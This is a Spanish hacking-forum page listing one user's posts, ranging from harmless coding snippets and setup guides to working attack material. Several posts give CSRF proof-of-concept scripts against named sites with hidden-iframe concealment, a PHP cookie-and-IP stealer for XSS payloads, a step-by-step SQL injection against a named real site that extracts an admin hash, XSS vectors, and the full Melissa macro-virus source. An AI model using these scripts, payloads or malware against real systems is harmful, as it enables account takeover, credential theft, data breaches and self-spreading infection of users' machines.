Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Matabarras

#1
Bueno, estaba algo disgustado con pccomponentes y me fije en las afiliaciones.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
La cual utilizaremos para logear a effiliation y para registrarnos.


Bueno, sabia que esto estaba vinculado a una web francesa de afiliaciones, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Entonces dije bien no pasa nada de nombre y descripción pondre un simple vector en xss, "><img src=x onerror=prompt(2)>

Pondre un correo temporal usare No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y listo , por si hace falta confirmar algo.

Me encuentro que email temporal si recibe un correo con un vector xss , pum te lo ejecuta y ya..
En este caso no solo es por el vector si no porque el contenido se envia como html y nada ejecuta el html del correo, pero esto no es lo grave aunque en parte si

(Podemos detectar si se usa emailtemporal por su extension, y siempre que se use añadir un pequeño poc de redirección para obtener datos y infinitas cosas a el usuario que utilize ese correo asi que ya no es tonteria.)

Lo más grave de emailtemporal vendra luego..

Bueno algo que me encuentro de "camino" como aquel que dice, volvamos a effilation pero claro una vez me logeo con el nombre de usuario, NO mi nombre que es un vector xss, pues effiliation me refleja el xss cada vez que recargo la web, comente algo, haga lo que haga, a todos les reflejare mi XSS.



Si puse elladodelmal como sitio web a modo troll.


Tambien nos damos cuenta que en la  dirección de reenvío por omisión, si colocamos un vector xss tambien los ejecutara, oh my god esta web no filtrada nada(?).


Sisi, ni siquiera cuando colocas la contraseña nueva te la pone en asteriscos, ni siquiera eso..

Tambien obtenemos un CSRF en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para toda la gente que tenga cuenta en ella y este iniciada como ya sabeis con un CSRF podemos cambiar la clave, debido a que cuando realizas la petición no lleva ningun token, ni siquiera te pide que pongas la contraseña actual.

Tengo ganas de dormir y no e echo el poc, pero vamos que se hace en menos de 5 minutos, y si alguien lo quiere puedo hacerlo.

Que guay es una web donde se gana dinero por afiliaciones, pero nada aqui cualquiera puede usurpar la cuenta de cualquiera..

Claro podemos usurpar la cuenta, o directamente meterle un XSS en el dirección de reenvió por omisión y hacer uso de BEEF, no se que seria peor no?.


Está bastante claro que no ofrece protección alguna a los clientes , aparte de tener repleto de XSS Y CSRF, pudiendo cambiar tambien la cuenta bancaria y demas donde recibir el dinero..


Y voy a parar... porque me estoy empezando a cabrear  bastante, y no quiero hacer nada malo :D

Pero espera, emailtemporal  si tiene un xss seguro hay algo más, que petición hace cada vez que abro un mensaje?



Si efectivamente dicen borrar todos los mensajes, y demas , si quizas los borren pero tardaran bastante pues tengo más de 1954227 mensajes que puedo mirar ahora mismo, y siguiendo.. debido a una falta de verificación y si nos deja utilizar la acción de ver mensajes, tambien nos deja utilizar otras acciones y hay lo dejo.

Hasta aqui hemos llegado y espero que les haya gustado esta pequeña anecdota que de seguir seguro nunca acabaria.

PD: Al reportar ahora a emailtemporal, en el contacto si nos fijamos podemos bombardearle el contacto con el mismo mensaje todo el rato, pues se envia y no te muestra ningun captcha en ningun momento y puedes enviarlo las veces que quieras.
#2
Hacking ShowOff / [IFXSS]Yourjavascript.com
Junio 12, 2016, 10:15:30 PM
Bueno aunque no es nada importante, mientras miraba unas cosas me lo vi y aqui lo dejo, y bueno el host es bastante util.


Vector: "<h1 onclick=alert("Matabarras")>

Reportado: Al correo de paypal de donaciones.
#3
Back-end / Manual PHP Instructivo Okol.
Junio 10, 2016, 10:47:29 AM
Les dejo aqui un manual que hizo Okol, hace unos años ya, para strikegeek que era un blog de sanko y mio pero que por  x motivos se dejo, no se si okol lo público alguna vez.



Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si el nombre es test.pdf, no recuerdo el porque lo tengo así en un disco duro  :o
#4
Hacking ShowOff / XSS Thephonehouse
Abril 05, 2016, 02:08:59 PM
Quería comprar un móvil y ..


Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Reportado? Si
La encontre el 15 de marzo,pero al fin hoy vi que lo arreglaron.
Fixeado? Si.

Agradecimiento? No  :-\ :'(
#5
Hacking ShowOff / [CSRF]Scanner Underc0de
Febrero 29, 2016, 10:37:00 AM
Url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: php
<?php
//Codded: Matabarras
$url = "scanner.underc0de.org"; //url
//Parametros post que modificaremos :D
$form["password"] = ""; //Dejamos el valor así debido a por defecto ya coge el valor del pwd.
$form["email"] = "[email protected]"; //cambiamos el correo por el que queramos
$form["fname"] = "meaburro"; //nombre
$form["lname"] = "vayavaya"; //apellidos
$form["newsletter"] = 0; //recibimos noticias 0 deshabilitado, 1 habilitado
$form["doupdate"] = "";
$form["processUser"] = 1;





echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/ajax/controller.php" method="POST">';
foreach($form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>


Camuflar el csrf, easy.

Código: php
// This code was coded by FrenetikK & Matabarras.


function writeIf(url) {
document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');


Index
Código: php
<script src="a.js"></script>


Soluciones:

- Solución fácil desactivar que se tome por si la contraseña.
- Solución fácil utilizar un catpcha decente como recaptcha.
-Solución fácil utilizar un referer(esto aun así seria bypasseable).
-Solución correcta, utilizar un token para cada cuenta y para cada petición.

Reportado? Si
Fixeado? Si pero no adecuadamente.


#6
Presentaciones y cumpleaños / Xop Xop!
Febrero 24, 2015, 10:21:38 AM
Hola! que tal todos, espero que bien les sigo leyendo siempre  ;D
#7
Delphi / Anotadores en Delphi [Open Source]
Octubre 12, 2014, 07:42:54 PM
Aqui el de metal_kingdom , solo es abrirlo y se guarda solo.
Código: delphi
program anotator;

var
  S: textfile;

begin
  AssignFile(S, 'func.txt');
{$I-} // No mostramos errores I/O para evitar msgboxes innecesarios.
  append(S); // intentamos escribir en fichero existente.
{$I+} // Vemos errores para comprobarlos
  if IOResult <> 0 then // [0 = Fue bien] Si el resultado no fue bueno al comprobar entonces ..
    rewrite(S); // si no se pudo entonces creamos archivo.
  WriteLn(S, paramstr(0)); // escribimos ruta completa del archivo en nueva línea.
  closefile(S); // cerramos archivo.
end.


Aqui el que hice yo ya hace, lo hice para que se anotara al cliquear.
Código: delphi
unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls;

type
  TForm1 = class(TForm)
    boton: TButton;
    procedure botonClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
  myFile : TextFile;
  text   : string;
  sFileName : string;
implementation

{$R *.dfm}

procedure TForm1.botonClick(Sender: TObject);
begin
sFileName:= ExtractFileName(Application.ExeName);



   AssignFile(myFile, 'Funcionales.txt');
   Append(myFile);

   WriteLn(myFile, sFileName);

   CloseFile(myFile);

   Reset(myFile);

   CloseFile(myFile);
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
    AssignFile(myFile, 'Funcionales.txt');
    ReWrite(myFile);
    CloseFile(myFile);
end;

end.


El codigo de metal_kingdom  es más corto,  y mejor.

Simplemente este post es una excusa para saludarles y espero que les vaya todo bien, saludos!  ;D
#8
Para la gente que no tiene scan, y necesita analizar muchas veces, aunque si esta bien que de vez en cuando no lo hagamos, ya que os da un scan gratuito por 1 solo click  ;D

PD: No es nada nuevo, ya muchos lo sabreis.

Nos instalamos el componente Grease Monkey No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una vez lo tenemos instalado, le añadimos el siguiente script.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Entramos a la web, le damos a Enabled & Install y listo.(Sirve para más webs tipo adfly.)

Y hay más tipos de scripts  :)




#9
Bueno despues de analizar la botnet Andromeda, despues de que la liberaran, (Podeis encontrarla aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) despues de encuentrar varias vulnerabilidades, pero que es normal que esten, como xss y demás..

Ya que se supone que solo va a utilizar el panel el administrador, y para que va a quererse hacer daño así mismo?.

Pero hasta que encontre, el directorio donde cambiamos nuestra contraseña etc etc..

Y no chequea el toquen ni el reffer, así que supose que seria vulnerable y empeze a crear el poc.

Más alla de todo, lo dificil es encontrar la web y el directorio, aunque si nos infectamos y conocemos a la persona.., pues se la podemos colar no?.

Bien, para no hacer tan descarado como siempre que público un csrf, utilizo el JS siguiente para camuflar.

Código: php
// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
document.write('');
}

writeIf('http://127.0.0.1/csrf.php');


Simplemente, si tenemos nuestro csrf subido a nuestra web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , y se llama csrf.php pues cambiamos el 127.0.0.1 por el de nuestra web sencillo no? xD.

Y en el index.html simplemente colocamos una redireccion hacia el JS. Supongamos que nuestro archivo se llama a.js.
Código: php
<script src="a.js"></script>


Pues aqui el csrf,
Código: php
<?php

//POC Change Password Andromeda Botnet
//codded: @Matabarras
$url = "web";
$form['newlogin'] = "admin";
$form['newpass1'] = "admin";
$form['newpass2']= "admin";

echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/nombredeldirectorio/?act=service&subact=logindata" method="POST">';

foreach($form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>


Una vez entren a la web que no se daran cuenta de nada gracias al JS.

Se le cambiara el usuario y contraseña y para acceder a la web simplemente pondremos en usuario Admin y en contraseña lo dejamos vacio.

Un saludo
#10


Texto escrito en el video:

Código: php
Bueno soy Morenako-Matabarras y les voy a explicar como se realiza un ataque de Sql injecion manualmente.

En primer lugar vamos a la web a la que vamos a realizar la injección.

http://mostalocalcouncil.com/readnews.php?id=

En mi caso está.

Existe varios comentarios, /* -- #

ya que puede ser que con un comentario funcione y otro no.

y varias formas de realizarla, yo les explicare de una forma sencilla


Miraremos aver si es vulnerable facilmente con la tipica comilla simple.

Vemos que nos da el error así que empezemos.


Empezaremos con un - y una id de noticia el 1

y uniremos ya con +union+select+ o simplemente union select o /**/union/**/select/**/0

Hay diversas formas, con diversos comentarios, bueno.

Ahora lo que tenemos que hacer es añadir números hasta que nos desaparezca el error

Vale a partir de 4 nos ha desaparecido el error.

Entonces, ahora es cuando vamos a buscar las tablas de las basesdedatos.

Lo que haremos sera sustutir por uno de esos números por group_concat(table_name)

Una vez echo eso añadimos al final

+from+information_schema.tables -- - , ya que esto no es a ciegas

utilizamos el comentario -- o -- - al final de la consulta.


Vale aqui nos muestra todas las tablas, para mi la más importante y primera a mirar sera users, una cosa he de decirles

Quizas al sustituir el group_concat(table_name) por otro numero, no aparece nada por ejemplo

Por el 0 no nos aparece nada, si cambiamos el 1 por group_concat(table_name) si y si cambiamos el 2 también, es ir probando.

Bueno ya tenemos la tabla users que queremos mirar, así que vamos a transformar


http://mostalocalcouncil.com/readnews.php
?id=-1+union+select+0,1,group_concat(table_name),3,4+from+information_schema.tables -- -117,115,101,114,115

ahora esto lo ponemos por ,.

Vale, la injeccion de momento la tenemos así

http://mostalocalcouncil.com/readnews.php
?id=-1+union+select+0,1,group_concat(table_name),3,4+from+information_schema.tables -- -

Ahora lo que haremos es cambiar en group_concat(table_name) por group_concat(column_name)

y information_schema.tables por information_schema.columns y añadiremos


http://mostalocalcouncil.com/readnews.php?id=-1+union+select+0,1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=char(117,115,101,114,115) -- -

Y aparte de  cambiar eso, hemos añadido +where+table_name=char(aqui el codigo en ascii value que nos dio separado por comillas) -- -

Nos da varias columnas

yo mirare la de username y password
Asi que modificamos la consulta. y en group_concat(colum_name)

Column_name lo cambiamos por las columnas que queremos mirar separandolas por una coma y quitamos todo apartir de information_schema poniendo simplemente el nombre de la tabla, que miramos anteriormente que era USERS

http://mostalocalcouncil.com/readnews.php?id=-1+union+select+0,1,group_concat(username,password),3,4+from+users -- -

admin 68b752263e82b3b1ee1ffe739ee0eec1

Y ya tenemos el usuario y hash de la contraseña

Si queremos miramos el email tambien, y la id

vemos que su id es 2

Bueno,espero que les aña servido el tutorial y lo hayan entendido

Un cordial saludo

Morenako,Matabarras
#11
Buenas, hoy les explicare como explotamos una web con fallo de verificación en los tokens, lo que produce que podamos provocar acciones ilegitimas en nuestra "víctima" sin su cosentimiento ni conocimiento.

En este caso programe un CSRF; para la web ciudadhabbo, que simplemente, cuando el autor entra a nuestra web, automaticamente se le cambie el perfil de su hotel públicado, de la ID que indicamos.

También podriamos crear un CSRF, para públicar el hotel a base del que yo hice, muy sencillo.

Les dejo el tutorial donde explico los pasos.


CSRF:

Código: php
<?php
//Codded: Matabarras/Morenako
// POC Cambio de Hotel Ciudadhabbo
$url = "ciudadhabbo.com";
$form["id"] = 26; //ID del hotel que queremos modificar
$form["nombre"] = "Murlocksito JUAPO";
$form["tipo"] = 1;
$form["name"] = "127.0.0.1";
$form["port"] = 80;
$form["web"] = "http://www.morenakomatabarras.com";
$form["info"] = "Pues probando a que si murlock";
$form["guardar"] = "Guardar+cambios";




echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/doedit.php" method="POST">';
foreach($form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>



JS camuflando el csrf.
Código: php
// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');
#12
Bueno despues de que me sigan en Twitter, me dio por mirar la web, dado que son 'informáticos' o así lo dice los titulos de su carrera.

Conclusión, acabe cabreado al observar que personas con carreras en la rama informática, dispongas de fallos tan comunes en sus sitios web.

Path vulnerable:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------------
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Screenshot:


Estado: Explotable.
Reportado: Si(Sin respuesta todavía por parte de los administradores)
Fecha del hallazgo: 9-3-2013.
Autor: Matabarras.
#13
Bueno, si nos dirijimos a un articulo de Somosprogramadores.

Por ejemplo el que use yo : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Que pasa, que insertamos un comentario y en el usuario metemos un Vector de XSS ,  y al comentar , bam! Nos imprime el vector XSS No lo filra.

Pero si recargamos la web, el vector se filtra.

Vale, hasta hay esto es 'pasivo'.

Pero que pasa, cuando otro usuario comenta en el articulo donde yo antés inserte mi vector XSS¿?
Esto:


Entoncés pasa a ser persistente.

Saludos   ;)
#14
Python / Mi primer script en Python.
Diciembre 09, 2012, 09:25:39 AM
Bueno hace nada, que leo algo de Python por culpa del gay de Sanko  ???

La cosa, esque los operadores son los mismos en casi todos los lenguajes, y se me hizo facilisimo, aprender lo basico de lo basico de lo basico¿? de Python .

Así que les dejo esta shit, como un empiezo (Como podreis observar, no lleva ni excepcionés.)
Código: Python
#!/usr/bin/python
#Shit calculadora, mi primer script en Python..
# 8-12-12 ..
#@Matabarras

import sys,webbrowser


print '''
===================================
       Calculadora Shit         
       Mi primer script en  Python     
       @Matabarras         
===================================
'''

   
print "Calculadora Shit"
print "Sumar"
print "Restar"
print "Dividir"
print "DivisionEntera"
print "Multiplicar"
print "Exponente"
print "Salir"

calculadorashit = raw_input("Elige la opcion que quieras : ")
if calculadorashit == "Salir":
    sys.exit()
else:
    primero = int( raw_input("Primer numero: "))
    segundo = int( raw_input("Segundo numero: "))
if calculadorashit == "Sumar":
    resultado = primero + segundo 


if calculadorashit == "Restar":
    resultado = primero - segundo
   
if calculadorashit == "Dividir":
    resultado = primero / segundo
if calculadorashit == "Multiplicar":
    resultado = primero * segundo
   
if calculadorashit == "Exponente":
    resultado = primero ** segundo

if calculadorashit == "DivisionEntera":
    resultado = primero // segundo

print "El resultado es " + str(resultado)

salir = raw_input("Quieres visitar mi Twiteer?: ")


if salir == "si":
   
    matabarras = webbrowser.Mozilla('firefox')
    matabarras.open_new('www.twitter.com/@matabarras')
   
elif salir == "no":
    print raw_input("Gracias por usar la calculadora..")
    sys.exit()
   

else:
    sys.exit()
#15
Hacking / Metasploit Payload Reverse_TCP [Meterpreter]
Noviembre 24, 2012, 01:15:03 PM
Aqui les dejo un tutorial, donde explico como utilizar el payload reverse_tcp, contra un windows XP.
Abriendo una sesión de meterpreter.
#16
Hacking / Instalación de Metasploit Framework 4.0 [Linux]
Noviembre 24, 2012, 01:13:57 PM
Bueno, aqui les dejo un tutorial donde sin más lo explico como instalar metasploit.

Son tutoriales, que hice en su momento, y ahora me dan algo de nostalgia jaja.
#17
Sin más aqui les dejo mis dos videos :)

Explicación sentencia IF  / ELSE .



Explicación Bucle While:


Saludos.
#18
Bueno, aqui otro tutorial que hice,hace casi un año.

Esta dividido en 2 Partes, y con voz también.

Parte 1:


Parte 2:
#19
Bueno voy a postear, unos tutoriales sobre PHP, que hice alredredor de 1 año, y creo que estan bien explicados para que la gente lo entienda.


(PD: La voz me ha cambiado jaaaaaaa.., aun era peque hay xD )

Sin más aqui el video explicativo.


Duración 14:07.
#20
Back-end / Robo de Cookies & IP & ISP
Julio 07, 2012, 06:16:51 AM
Código: php
<?php

if(isset($_GET["leer"])) {

$read = file_get_contents("cookie.txt");
echo $read;

} else {
$cookie = $_GET["cookie"];
$texto = "Ip: ".$_SERVER["REMOTE_ADDR"] . " - ISP : ".gethostbyaddr($_SERVER["REMOTE_ADDR"])." - Fecha: ".date("H:i:s d/m/Y")." - Cookie: ".$cookie."<br>";
$l = file_get_contents("cookie.txt");
file_put_contents("cookie.txt",$texto.$l);
}
?>



Esto es util cuando cogemos una xss, y la explotamos por ejemplo:
<script>location.href=\'No tienes permitido ver los links. Registrarse o Entrar a mi cuenta .cookie;</script>
#21
Back-end / Script Steal IP [Freneetik-Matabarras-]
Julio 07, 2012, 06:15:21 AM
Código: php
<?php
file_put_contents("ip.txt",file_get_contents("ip.txt")."IP: ".$_SERVER["REMOTE_ADDR"].PHP_EOL);

?>


Asi de simple xD.

Recuerden darle permisos 777 al archivo de texto.
#22
Wargames y retos / Reto XSS by Xt3mp & PQS
Julio 05, 2012, 09:39:38 PM
Hola, aqui les dejo este reto que hicimos xt3mp y yo, la verdad, es de dificultad media por así decirlo.

Iva a ser más facil, pero llevo rato esperando a xt3mp y no sé conecta el cabron xD, así que aqui os lo dejo.

Igualmente seguro volvemos a hacer otro y más dificil.

Screenshot:



Nivel de Dificultad : Medio

Objeto: XSS , (Mostrar una alerta con tu NICK)

Dirección web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Maximo de Ganadores : 3.

Cuando hayan pasado el reto 3 personas, públicare la solución y explicación.

#23


Nos lo descargamos de la web oficial
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Nos colocamos en la carpeta de descargas, y lo descomprimimos moviendolo a /opt

Código: php
cd Descargas
tar xvfz xampp-linux-1.7.7.tar.gz -C /opt



Iniciamos xampp
Código: php
 /opt/lampp/lampp start 




Ahora configuramos la seguridad, yo en mi caso solo le meti pass a la mysql y phpmy.
Código: php
/opt/lampp/lampp security



y ya tenemos xampp instalado y configurado xD.
#24
Bueno aveces,  os pasara como ami xD, instalaremos firestarter, y cuando vayamos aver que pasa y que blockea el cortafuegos este tan útil os lo recomiendo.

Nos dara un error de la bitacora como este:


Entoncés nosotros, lo que haremos sera abrir terminal y tipear
ubuntu:
sudo gedit  /etc/rsyslog.d/50-default.conf

xubuntu
sudo abiword /etc/rsyslog.d/50-default.conf

Etc etc.., cada distru poneis su editor de textos, en mi caso fue abiword  xD

Así que abrimos eso y en el archivo tendremos que borrar los # de las 3 lineas que selecciono en la siguiente imágen .


Pues quitaremos esos # en de esas lineas, y lo dejaremos sin # porque es un fallo del programa que los mete como comentario.

Despues de quitarlos, iremos a terminal y tipearemos
sudo service rsyslog restart
Esto reseteare el servicio del log, y ya podremos abrir firestarter y ver los eventos.
#25
Código fuente del virus Melissa que en Marzo de 1999 infectó a gran cantidad de archivos Word Excel gracias a los macros que incorporan estos dos programas.


Código: php
 Private Sub AutoOpen() 
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub